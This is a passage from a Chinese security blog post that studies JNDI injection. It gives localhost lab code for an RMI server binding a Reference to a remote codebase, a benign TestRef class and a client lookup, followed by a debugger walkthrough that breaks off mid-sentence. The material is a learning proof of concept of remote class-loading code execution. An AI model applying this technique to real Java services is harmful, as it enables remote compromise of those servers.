<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>关于JNDI注入那点事儿 | F4miti0n&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="JNDI概述JNDI(Java Naming and Directory Interface，Java命名和目录接口)是为Java应用程序提供命名和目录访问服务的API，允许客户端通过名称发现和查找数据、对象，用于提供基于配置的动态调用。这些对象可以存储在不同的命名或目录服务中，例如RMI、CORBA、LDAP、DNS等。   JNDI包括以下提供者  LDAP  轻量级目录协议    RMI">
<meta property="og:type" content="article">
<meta property="og:title" content="关于JNDI注入那点事儿">
<meta property="og:url" content="http://example.com/2023/05/02/jndi%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="F4miti0n&#39;s Blog">
<meta property="og:description" content="JNDI概述JNDI(Java Naming and Directory Interface，Java命名和目录接口)是为Java应用程序提供命名和目录访问服务的API，允许客户端通过名称发现和查找数据、对象，用于提供基于配置的动态调用。这些对象可以存储在不同的命名或目录服务中，例如RMI、CORBA、LDAP、DNS等。   JNDI包括以下提供者  LDAP  轻量级目录协议    RMI">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427164137.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427164433.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427165222.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427165646.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427171303.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427171913.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427172105.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427172202.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427172438.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427173116.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427173536.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427173953.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427175123.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427175702.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427180002.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427180907.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161109.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161206.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161415.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161450.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428161630.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428162517.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428162759.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428163631.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428163751.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428163950.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428164219.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428164825.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428164939.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230428170049.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230429003829.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230429235851.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430000246.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430001543.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430002324.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430002225.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430003143.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430004750.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430011249.png">
<meta property="og:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230430005921.png">
<meta property="article:published_time" content="2023-05-02T05:34:20.000Z">
<meta property="article:modified_time" content="2023-08-21T02:57:08.187Z">
<meta property="article:author" content="F4miti0n">
<meta property="article:tag" content="Java安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427164137.png">
  
    <link rel="alternate" href="/atom.xml" title="F4miti0n's Blog" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/images/banner.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>F4miti0n's Blog </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <img src="/images/avatar.png" alt="avatar">
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">F4miti0n </div>
      <div class="dot"></div>
      <div class="subtitle">每天都在对抗无趣的生活 </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://store.steampowered.com" title="Steam"><i class="fa-brands fa-steam"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      



    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Tags</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E5%A4%8D%E7%8E%B0/" rel="tag">CTF复现</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CTF%E6%80%BB%E7%BB%93/" rel="tag">CTF总结</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/HackTheBox/" rel="tag">HackTheBox</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E5%AE%89%E5%8D%93%E6%B8%97%E9%80%8F/" rel="tag">安卓渗透</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%97%B2%E8%B0%88/" rel="tag">闲谈</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Archives</h3>
      
      
        <a class="archive-link" href="/archives/2024/03 ">
          March 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/02 ">
          February 2024 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2024/01 ">
          January 2024 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          November 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          October 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          September 2023 
          <div class="archive-count">6 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/08 ">
          August 2023 
          <div class="archive-count">7 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/07 ">
          July 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/05 ">
          May 2023 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/04 ">
          April 2023 
          <div class="archive-count">2 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/03 ">
          March 2023 
          <div class="archive-count">1 </div>
        </a>
      
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/2024/03/10/RASPDemo/">
            <div class="recent-link-text">
              从零开始的RASP学习
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/26/Weblogic%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90(%E4%B8%80)/">
            <div class="recent-link-text">
              Weblogic漏洞分析(一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/02/19/Jackson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%20(%E4%B8%80)/">
            <div class="recent-link-text">
              Jackson漏洞分析 (一)
            </div>
          </a>
        
          <a class="recent-link" href="/2024/01/01/2023%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/">
            <div class="recent-link-text">
              关于2023的年度总结
            </div>
          </a>
        
          <a class="recent-link" href="/2023/11/05/Mysql%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/">
            <div class="recent-link-text">
              Mysql任意文件读取
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-jndi注入学习" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        关于JNDI注入那点事儿
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2023-05-02T05:34:20.000Z" itemprop="datePublished">2023-05-02</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    Uncategorized 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            2.7k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h3 id="JNDI概述"><a href="#JNDI概述" class="headerlink" title="JNDI概述"></a>JNDI概述</h3><p>JNDI(Java Naming and Directory Interface，Java命名和目录接口)是为Java应用程序提供命名和目录访问服务的API，允许客户端通过名称发现和查找数据、对象，用于提供基于配置的动态调用。这些对象可以存储在不同的命名或目录服务中，例如RMI、CORBA、LDAP、DNS等。  </p>
<p>JNDI包括以下提供者</p>
<ul>
<li>LDAP<blockquote>
<blockquote>
<p>轻量级目录协议</p>
</blockquote>
</blockquote>
</li>
<li>RMI<blockquote>
<blockquote>
<p>远程对象注册表,具体内容可看RMI反序列化学习</p>
</blockquote>
</blockquote>
</li>
<li>DNS<blockquote>
<blockquote>
<p>域名解析服务</p>
</blockquote>
</blockquote>
</li>
<li>CORBA的COS服务</li>
</ul>
<h3 id="JNDI与RMI"><a href="#JNDI与RMI" class="headerlink" title="JNDI与RMI"></a>JNDI与RMI</h3><p>ps ：这个方法在jdk8u121后就被修复了，能碰到的话，评价是且用且珍惜</p>
<h4 id="导入Demo"><a href="#导入Demo" class="headerlink" title="导入Demo"></a>导入Demo</h4><p>JndiRmiServer</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIRMIServer</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NamingException, RemoteException &#123;  </span><br><span class="line">        <span class="type">InitialContext</span> <span class="variable">initialContext</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InitialContext</span>();  </span><br><span class="line">        </span><br><span class="line">        <span class="comment">//HelloImpl hello = (HelloImpl) initialContext.lookup(&quot;rmi://127.0.0.1/Hello&quot;);  </span></span><br><span class="line">        <span class="comment">//hello.sayhello(&quot;xxxxxx&quot;);  </span></span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>JndiRmiClient</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIRMIClient</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NamingException, RemoteException &#123;  </span><br><span class="line">        <span class="type">InitialContext</span> <span class="variable">initialContext</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InitialContext</span>();  </span><br><span class="line">        <span class="type">HelloImpl</span> <span class="variable">hello</span> <span class="operator">=</span> (HelloImpl) initialContext.lookup(<span class="string">&quot;rmi://127.0.0.1:1099/Hello&quot;</span>);  </span><br><span class="line">        hello.sayhello(<span class="string">&quot;xxxxxx&quot;</span>);  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里的话，就是通过lookup这个函数去加载rmi远程注册表上的Hello对象，假如这里是可控的话，我们显然可以加载自设的恶意RMI服务，从而实现反序列化任意对象的目的，但这个并不是传统意义上的Jndi注入</p>
<h4 id="传统Jndi注入"><a href="#传统Jndi注入" class="headerlink" title="传统Jndi注入"></a>传统Jndi注入</h4><p>解释：将远程对象设置为引用对象，关于引用对象的概念有点类似于代理模式<br>(当调用引用对象的时候【这里体现客户端获取引用对象?&#x2F;调用引用对象方法？】,会自动调用设定的factory类里的代码)<br>下面是们要用到的一些demo源码</p>
<h5 id="IRemote接口"><a href="#IRemote接口" class="headerlink" title="IRemote接口"></a><code>IRemote接口</code></h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.rmi.Remote;  </span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;   </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">interface</span> <span class="title class_">IRemote</span> <span class="keyword">extends</span> <span class="title class_">Remote</span>&#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">sayhello</span><span class="params">(String words)</span> <span class="keyword">throws</span> RemoteException;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h5 id="Main-RMI注册"><a href="#Main-RMI注册" class="headerlink" title="Main(RMI注册)"></a><code>Main(RMI注册)</code></h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.example.HelloImpl;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">import</span> java.rmi.NotBoundException;  </span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;  </span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;  </span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Main</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> RemoteException, NotBoundException, InterruptedException &#123;  </span><br><span class="line">        <span class="type">Registry</span> <span class="variable">registry</span> <span class="operator">=</span> LocateRegistry.createRegistry(<span class="number">1099</span>); </span><br><span class="line">        <span class="comment">// 创建本地主机上的远程对象注册表  </span></span><br><span class="line">        <span class="type">HelloImpl</span> <span class="variable">hello</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HelloImpl</span>(); </span><br><span class="line">        <span class="comment">// 创建一个实现了Hello接口的远程对象  </span></span><br><span class="line">        registry.rebind(<span class="string">&quot;Hello&quot;</span>, hello); </span><br><span class="line">        <span class="comment">// 将该远程对象绑定到名为&quot;Hello&quot;的条目上  </span></span><br><span class="line">        <span class="keyword">while</span>(<span class="literal">true</span>)&#123;  </span><br><span class="line">            Thread.sleep(<span class="number">10</span>);  </span><br><span class="line">        &#125;  </span><br><span class="line"><span class="comment">//        IRemote hellox = (IRemote) registry.lookup(&quot;Hello&quot;);  </span></span><br><span class="line"><span class="comment">//// 通过名称查找并返回对应的远程对象引用  </span></span><br><span class="line"><span class="comment">//        hello.sayhello(&quot;aaacccca&quot;);  </span></span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h5 id="JndiRmiServer"><a href="#JndiRmiServer" class="headerlink" title="JndiRmiServer"></a><code>JndiRmiServer</code></h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIRMIServer</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NamingException, InterruptedException &#123;  </span><br><span class="line">        <span class="type">InitialContext</span> <span class="variable">initialContext</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InitialContext</span>();  </span><br><span class="line">        <span class="type">Reference</span> <span class="variable">reference</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Reference</span>(<span class="string">&quot;TestRef&quot;</span>, <span class="string">&quot;TestRef&quot;</span>, <span class="string">&quot;http://localhost:8991/&quot;</span>);  </span><br><span class="line">        initialContext.rebind(<span class="string">&quot;rmi://127.0.0.1:1099/testref&quot;</span>,reference);  </span><br><span class="line">        <span class="keyword">while</span>(<span class="literal">true</span>)&#123;  </span><br><span class="line">            Thread.sleep(<span class="number">1</span>);  </span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<h5 id="TestRef"><a href="#TestRef" class="headerlink" title="TestRef"></a><code>TestRef</code></h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.IOException;  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestRef</span>&#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">TestRef</span><span class="params">()</span> <span class="keyword">throws</span> IOException &#123;  </span><br><span class="line">        System.out.println(System.getProperty(<span class="string">&quot;user.dir&quot;</span>));  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>客户端</p>
<h5 id="JndiRmiClient"><a href="#JndiRmiClient" class="headerlink" title="JndiRmiClient"></a><code>JndiRmiClient</code></h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIRMIClient</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NamingException, RemoteException &#123;  </span><br><span class="line">        <span class="type">InitialContext</span> <span class="variable">initialContext</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InitialContext</span>();  </span><br><span class="line">        <span class="type">IRemote</span> <span class="variable">hello</span> <span class="operator">=</span> (IRemote) initialContext.lookup(<span class="string">&quot;rmi://localhost:1099/testref&quot;</span>);  </span><br><span class="line">        <span class="comment">//hello.sayhello(&quot;xxxxxx&quot;);  </span></span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>以上例子本质上还是利用类加载机制来实现的RCE，仍然没有跳出我们之前的所学范围<br>而这里的具体利用，其实就是之前RMI反序列化部分学习过的codebase恶意类加载，没什么过多好说的</p>
<h4 id="lookup跟踪调试"><a href="#lookup跟踪调试" class="headerlink" title="lookup跟踪调试"></a>lookup跟踪调试</h4><p>在客户端这里给lookup方法上个断点，跟进调试一下<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427164137.png"><br>首先进入了<code>InitialContext#lookup</code>:<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427164433.png"><br>继续跟进一下来到了<code>GenericURLContext</code><br>(这里是由前面的getURLOrDefaultInitCtx决定的,由于JNDI调用的是RMI服务,所以这里进的是GenericURLcontext类,对于不同的服务,进入的Context不同(具体详情可以自己跟进一下<code>getURLDefaultInitCtx</code> ),接着跟进 <code>ctx.lookup</code><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427165222.png"><br>定位到了<code>RegistryContext</code> 这里,跟进断点处的lookup<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427165646.png"><br>这里的话是调用了注册中心的lookup方法,是本次重载的最后一层了,好像在这个方法这里也有一个相关的利用点,先不做深究了,这里执行一下lookup<br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/JNDI%E6%B3%A8%E5%85%A5%201/Pasted%20image%2020230427171303.png"><br>可以看到从远程注册表那里取回了一个obj对象,但出乎意料的是对象的类型不是我们预料中的引用类型的对象,猜测上一层的lookup处进行了加密处理<br>(后来看了看别的博主，发现猜错了，是在服务端那里加的密)<br>(  